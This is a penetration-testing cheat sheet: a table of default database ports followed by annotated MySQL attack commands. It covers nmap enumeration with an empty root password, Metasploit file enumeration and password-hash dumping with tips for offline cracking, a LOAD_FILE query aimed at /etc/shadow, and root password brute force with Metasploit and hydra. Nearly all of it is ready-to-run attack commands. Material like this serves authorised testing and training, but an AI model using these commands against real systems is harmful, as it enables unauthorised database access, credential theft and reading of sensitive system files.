| Database | Port(s) | Doc |
|---|---|---|
| MaxDB | 7210 | Doc |
| MySQL | 3306 | Doc |
| Oracle DB | 1521, 1830 | Doc |
| PostgreSQL | 5432 | Doc |
| SQL Server (MSSQL) | 1433 (TCP), 1434 (UDP, SQL Server Browser) | Doc |
| Database | Port(s) | Doc |
|---|---|---|
| Cassandra | 7000, 7001, 9042 | Doc |
| CouchDB | 5984 | Doc |
| Elasticsearch | 9200, 9300 | Doc |
| MongoDB | 27017, 27018, 27019, 28017 | Doc |
| Neo4J | 7473, 7474 | Doc |
| Redis | 6379 | Doc |
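# MySQL enumeration on the default port (3306). $IP is the target address; it is
# quoted below so the commands also survive hostnames or variables with odd characters.
# NOTE(review): nmap's NSE mysql library logs in with mysql_native_password; against a
# MySQL 8 server whose accounts use caching_sha2_password the credentialed scripts below
# can fail to authenticate even with correct credentials — confirm before trusting a
# "login failed" result.

# Default scan: service/version detection only, no scripts
nmap "$IP" -sV -p 3306
# Unauthenticated: does root (or the anonymous account) accept an empty password?
nmap "$IP" -sV -p 3306 --script=mysql-empty-password
# Unauthenticated: server version, protocol, thread id, capabilities, status, salt
nmap "$IP" -sV -p 3306 --script=mysql-info

# Everything from here on needs a working login. root with an empty password is shown;
# replace mysqlpass with whatever mysql-empty-password or the brute force below found.
# Accounts in mysql.user
nmap "$IP" -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Databases the account can see
nmap "$IP" -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Server variables — secure_file_priv, local_infile, datadir and plugin_dir decide
# whether LOAD_FILE()/INTO OUTFILE style tricks have any chance of working
nmap "$IP" -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# CIS benchmark audit. The rule file ships with nmap; the path below is the Debian/Kali
# layout, use `locate mysql-cis.audit` elsewhere
nmap "$IP" -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Connect directly without a password (no -p, so the client sends an empty password)
mysql -h "$IP" -u root
# Run an arbitrary query through nmap (books.authors is only an example table)
nmap "$IP" -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"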
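# Metasploit way: enumerate files/directories on the database host.
# NOTE(review): the original listed no `use` line. DIR_LIST is an option of
# auxiliary/scanner/mysql/mysql_file_enum, so that is presumably the intended module —
# confirm. The module needs a valid login (USERNAME/PASSWORD, root/'' by default) and
# enough privilege to load files; a restrictive secure_file_priv makes every probe
# report "not found".
# $IP is a placeholder here: msfconsole does not expand shell variables, so type the
# address, or hand the whole sequence to the shell with `msfconsole -q -x "..."`.
msfconsole
use auxiliary/scanner/mysql/mysql_file_enum
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run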
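## Hashdump
# Dump password hashes from mysql.user. Needs a login that may read that table (root is
# shown; swap in whatever the brute force found). Crack the output offline with john or
# hashcat — the classic `*<40 hex>` SHA1 hashes are cheap, MySQL 8 caching_sha2_password
# hashes are a different and far slower format.
# $IP is a placeholder: msfconsole does not expand shell variables, type the address or
# pass the commands via `msfconsole -q -x "..."` so the shell expands it.
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg rhosts $IP
set username root
set password ""
run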
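-- Read a file from the database host from inside the mysql client (after `mysql -h $IP -u root`).
-- Works only when the account holds the FILE privilege and secure_file_priv does not
-- restrict the path; otherwise LOAD_FILE() quietly returns NULL rather than an error.
-- mysqld normally runs as the unprivileged mysql user, so /etc/shadow (0640 root:shadow)
-- is usually unreadable — /etc/passwd, my.cnf or the application's config are more
-- realistic first targets.
-- Single quotes, not double: with sql_mode ANSI_QUOTES a double-quoted token is an
-- identifier and the statement errors out.
SELECT LOAD_FILE('/etc/shadow');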
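## Password brute force
# Metasploit: the original listed only the module and the wordlist. The module also
# needs a username (USERNAME or USER_FILE) and RHOSTS before `run`; STOP_ON_SUCCESS
# stops the run at the first hit. $IP is a placeholder that msfconsole will not expand.
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set username root
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set stop_on_success true
run
# hydra equivalent. -f stops after the first valid password. Keep the thread count modest
# (-t 4): hammering the listener can trip max_connect_errors host blocking or the
# connection_control lockout plugin on the target — confirm against its version.
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 -f "$IP" mysql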